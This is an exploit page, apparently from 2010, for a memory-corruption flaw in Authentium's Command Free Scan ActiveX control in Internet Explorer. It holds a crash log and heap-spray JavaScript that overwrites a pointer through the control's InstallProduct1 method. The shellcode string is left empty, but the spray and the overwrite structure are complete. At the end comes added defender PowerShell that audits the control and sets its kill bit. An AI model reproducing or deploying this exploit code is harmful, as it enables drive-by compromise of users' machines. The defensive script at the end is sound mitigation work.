Authentium Command Free Scan ActiveX Control Memory corruption Exploit
Source: nso-research[at]sotiriu.de  Author: Sotiriu  Published: 2010-03-08

<html>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png"><br>
<h2>Authentium Command Free Scan ActiveX Control Memory corruption Exploit</h2>
Author:   Nikolas Sotiriu (lofi)
Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt

Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.

<input language=JavaScript onclick=shoot() type=button value="Rule#5 Shoot first"><br>

<h3>ActiveX Control Information:</h3>
Name:              CSS Web Installer Class
Prog ID:           CSSWEBLib.Installer
Vendor:            Authentium, Inc.
Type:              ActiveX-Control
Version:           1.4.9508.605
GUID:              {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:              cssweb.dll
Folder:            C:\WINDOWS\Downloaded Program Files\
Safe for Script:   True
Safe for Init:     True
IObjectSafety:     False

<h3>Test Information:</h3>
- Windows XP SP3 IE7 Ger

<h3>M$ Exploitability Information</h3>

(158.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242
eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll -
cssweb!DllUnregisterServer+0x37a3:
1000c1a9 8917            mov     dword ptr [edi],edx  ds:0023:42424242=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:005> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x42424242
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x223e0447.0x22676030

Stack Trace:
cssweb!DllUnregisterServer+0x37a3
cssweb!DllUnregisterServer+0x22d8
mshtml!CFontCache::GetBaseCcs+0x1bd
mshtml!CStr::Set+0x1b
mshtml!COneRun::Clone+0x87
Instruction Address: 0x000000001000c1a9

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)

User mode write access violations that are not near NULL are exploitable.


</pre>
<object classid='clsid:6CCE3920-3183-4B3D-808A-B12EB769DE12' id='obj'></object>

<script language='javascript'>

 shellcode = unescape(''); // encoded shellcode payload omitted


 nops = unescape('%u9090%u9090');
 headersize = 20;

 slackspace = headersize + shellcode.length;

 //Filling the header
 while (nops.length < slackspace) nops += nops;
 fillblock = nops.substring(0, slackspace);
 block = nops.substring(0, nops.length - slackspace);

 while (block.length + slackspace < 0x30000) block = block + block + fillblock;

 //Creating the array.
 memory = new Array();

 //Filling the array with the nops + shellcode.
 for (counter = 0; counter < 300; counter++) memory[counter] = block + shellcode;

 //This is our RET
 edx = unescape('%08%08%08%08');

 ret = '';
 //Junk
 for (counter = 0; counter <= 2075; counter++) ret += unescape('%42');

 //Build the pointer to our overwritten RET
 //I know this looks strange but it was the only way I found to overcome
 //the badchar problem (0x8E=>bad 0x94=>bad)
 ret += unescape('%18');
 ret += "?; //%8E must be given in as unicode sign (beware of your editor)
 ret += "?; //%95 must be given in as unicode sign (beware of your editor)
 ret += unescape('%01');
 //Pointer is => 0x01948e18 from cssweb.dll

function shoot()
 {
 obj.InstallProduct1(edx,ret)

 }

</script>
</body>
</html>
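The control above is marked Safe for Scripting and Safe for Initialization without implementing IObjectSafety, and the write AV shows attacker-controlled edx written to attacker-controlled edi, so the practical defence is to stop Internet Explorer instantiating that CLSID at all. The following PowerShell is an added defender-side example, not code from the advisory or from Authentium: it reports how IE treats the CLSID listed on this page (registration, safety categories, kill bit) and can set the kill bit. The CLSID is the one from the page; the registry paths, component-category GUIDs and the 0x400 flag value are Microsoft's documented locations, and the function names are my own.

```powershell
# Added example (not from the advisory): audit IE's view of an ActiveX CLSID and
# optionally set its kill bit. CLSID from the advisory above; registry paths and
# category GUIDs are the documented Microsoft locations, not values from the page.
param(
    [string]$Clsid = '{6CCE3920-3183-4B3D-808A-B12EB769DE12}',
    [switch]$SetKillBit
)

# Component categories a control registers to claim "safe for scripting"/"safe for init"
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
# Kill bit: IE refuses to load a control whose Compatibility Flags has 0x400 set
$KillBit = 0x400

function Get-CompatKey([string]$Clsid) {
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-ActiveXStatus([string]$Clsid) {
    $clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $server = (Get-ItemProperty -Path "$clsidKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    $flags  = (Get-ItemProperty -Path (Get-CompatKey $Clsid) -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    [pscustomobject]@{
        Clsid            = $Clsid
        Registered       = Test-Path $clsidKey
        InprocServer     = $server
        SafeForScripting = Test-Path "$clsidKey\Implemented Categories\$SafeForScripting"
        SafeForInit      = Test-Path "$clsidKey\Implemented Categories\$SafeForInit"
        KillBitSet       = ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
    }
}

function Set-ActiveXKillBit([string]$Clsid) {
    $key = Get-CompatKey $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    # OR the flag in so any other compatibility bits already set are preserved
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($current -bor $KillBit) -Type DWord
}

Get-ActiveXStatus $Clsid | Format-List
if ($SetKillBit) {
    Set-ActiveXKillBit $Clsid          # requires an elevated shell
    Get-ActiveXStatus $Clsid | Format-List
}
```

On 64-bit Windows a 32-bit control is also governed by the same key under HKLM\SOFTWARE\Wow6432Node, so audit and set both paths there. Setting the kill bit does not unregister cssweb.dll; it only stops IE from creating the object.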